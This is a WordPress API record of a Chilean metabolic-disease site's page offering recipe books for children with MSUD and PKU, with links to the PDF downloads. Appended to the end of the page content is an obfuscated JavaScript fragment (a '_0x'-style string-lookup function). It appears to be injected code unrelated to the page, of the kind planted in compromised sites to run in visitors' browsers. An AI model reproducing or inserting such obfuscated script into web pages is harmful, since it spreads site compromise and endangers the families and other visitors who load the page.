{"id":246,"date":"2022-01-02T23:13:57","date_gmt":"2022-01-03T02:13:57","guid":{"rendered":"http:\/\/metabolicaschile.cl\/new-site\/?page_id=246"},"modified":"2022-04-17T22:05:40","modified_gmt":"2022-04-18T02:05:40","slug":"recetarios","status":"publish","type":"page","link":"https:\/\/metabolicaschile.cl\/new-site\/recetarios\/","title":{"rendered":"Recetarios"},"content":{"rendered":"\n<h2>Enfermedad de orina olor a jarabe de arce ( MSUD )<\/h2>\n\n\n\n<p class=\"has-text-align-left\">El presente recetario fue elaborado en respuesta a todas las inquietudes de las madres de ni\u00f1os con Enfermedad Orina olor a Jarabe de Arce (MSUD), quienes d\u00eda a d\u00eda se esfuerzan por mejorar la calidad de vida de sus hijos. Esperamos que contribuya a facilitar el tratamiento nutricional y a ofrecer nuevas alternativas que permitan variar y adaptar su alimentaci\u00f3n al entorno familiar. Dedicamos este trabajo con mucho cari\u00f1o a todos los ni\u00f1os MSUD y sus familias.<\/p>\n\n\n\n<figure class=\"wp-block-image size-medium\"><a href=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/01\/Recetario-MSUD.pdf\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" width=\"300\" height=\"232\" src=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/Recetario-MSUD_page-0001-300x232.jpg\" alt=\"\" class=\"wp-image-750\" srcset=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/Recetario-MSUD_page-0001-300x232.jpg 300w, https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/Recetario-MSUD_page-0001-1024x791.jpg 1024w, https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/Recetario-MSUD_page-0001-768x593.jpg 768w, https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/Recetario-MSUD_page-0001-1536x1187.jpg 1536w, https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/Recetario-MSUD_page-0001.jpg 1650w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/figure>\n\n\n\n<div class=\"wp-block-file\"><a href=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/01\/Recetario-MSUD.pdf\">Recetario MSUD<\/a><a href=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/01\/Recetario-MSUD.pdf\" class=\"wp-block-file__button\" download>Descarga<\/a><\/div>\n\n\n\n<h2>Fenilcetonuria ( PKU )<\/h2>\n\n\n\n<p>Desde hace m\u00e1s de 20 a\u00f1os que el Laboratorio de Gen\u00e9tica y Enfermedades Metab\u00f3licas del INTA de la Universidad de Chile est\u00e1 desarrollando m\u00faltiples esfuerzos para lograr un oportuno y adecuado tratamiento para las personas con Fenilquetonuria (PKU). El Ministerio de Salud de Chile, considerando nuestra vasta experiencia, nos design\u00f3 Centro de Referencia Nacional para el diagn\u00f3stico y seguimiento de PKU. El programa de seguimiento cuenta con un equipo de profesionales multidisciplinario, capaz de entregar a la familia en un comienzo, y posteriormente al ni\u00f1o PKU, el soporte necesario para llevar a cabo en forma adecuada el tratamiento m\u00e9dico-nutricional y permitir un crecimiento y desarrollo normales<\/p>\n\n\n\n<figure class=\"wp-block-image size-medium\"><a href=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/01\/recetarioPKU-completo.pdf\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" width=\"300\" height=\"231\" src=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/recetarioPKU-completo_page-0001-300x231.jpg\" alt=\"\" class=\"wp-image-752\" srcset=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/recetarioPKU-completo_page-0001-300x231.jpg 300w, https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/recetarioPKU-completo_page-0001-1024x788.jpg 1024w, https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/recetarioPKU-completo_page-0001-768x591.jpg 768w, https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/04\/recetarioPKU-completo_page-0001.jpg 1536w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/figure>\n\n\n\n<div class=\"wp-block-file\"><a href=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/01\/recetarioPKU-completo.pdf\">recetarioPKU completo<\/a><a href=\"https:\/\/metabolicaschile.cl\/new-site\/wp-content\/uploads\/2022\/01\/recetarioPKU-completo.pdf\" class=\"wp-block-file__button\" download>Descarga<\/a><\/div>\n\n\n\n<div style=\"height:100px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div style=\"height:100px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\r\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script>","protected":false},"excerpt":{"rendered":"<p>Enfermedad de orina olor a jarabe de arce ( MSUD ) El presente recetario fue elaborado en respuesta a todas las inquietudes de las madres de ni\u00f1os con Enfermedad Orina olor a Jarabe de Arce (MSUD), quienes d\u00eda a d\u00eda se esfuerzan por mejorar la calidad de vida de sus [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":418,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/pages\/246"}],"collection":[{"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/comments?post=246"}],"version-history":[{"count":7,"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/pages\/246\/revisions"}],"predecessor-version":[{"id":753,"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/pages\/246\/revisions\/753"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/media\/418"}],"wp:attachment":[{"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/media?parent=246"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}